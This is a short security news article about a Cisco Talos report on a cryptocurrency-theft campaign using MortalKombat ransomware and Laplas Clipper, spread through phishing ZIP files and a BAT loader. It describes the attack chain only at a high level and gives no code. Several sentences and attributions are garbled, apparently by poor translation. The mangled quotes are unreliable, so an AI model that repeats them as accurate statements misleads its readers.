A new financial fraud campaign has been spotted using variants of Xorist’s commodity ransomware “MortalKombat” and Laplas Clipper malware.
The cyberattacks aim to steal cryptocurrencies from victims, and reportedly target victims primarily in the United States, but also in the United Kingdom, Turkey, and the Philippines.
“Leveraging cryptocurrencies offers threat actors compelling advantages such as anonymity, decentralization and lack of regulation, making them more difficult to track.” Cisco Talos I wrote on Tuesday’s recommendation.
The company says it discovered an attacker scanning the Internet for victim machines using exposed Remote Desktop Protocol (RDP) ports. He then used one of his download servers to run his RDP crawler to facilitate deployment of the MortalKombat ransomware.
From a technical standpoint, the attacks seen as part of this campaign start with a phishing email. The email initiates a multi-stage attack chain in which actors deliver either malware or ransomware, removing evidence of their malicious presence on infected machines.
“The malicious ZIP file attached to the initial phishing email contained a BAT loader script,” it said. Recommendation.
When the victim executes the loader script, another malicious ZIP file is downloaded from the attacker-controlled hosting server to the victim’s machine, automatically unpacked, and contains a payload (Laplas Clipper malware or MortalKombat ransomware GO variant) is executed.
“The loader script runs the dropped payload as a process on the victim’s machine, removing the downloaded and dropped malicious files and cleaning up infection markers,” writes Cisco Talos.
To defend against this campaign, Cisco Talos urged businesses to exercise caution when trading cryptocurrencies.
KnowBe4 security awareness advocate Erich Kron shared Cisco Talos security recommendations, adding that organizations should focus on email phishing defenses.
“While many organizations still allow .ZIP files as attachments, there may be no reason why most employees can send this type of file. Information security on mail. “These types of archive files are regularly used when attempting to spread malware, so disallowing them could significantly improve our ability to defend against these campaigns.”
Phishing-based attacks were also at the center of a recent report from Cofense that suggested using Telegram bots as a source of phished information. 800% growth Between 2021 and 2022.
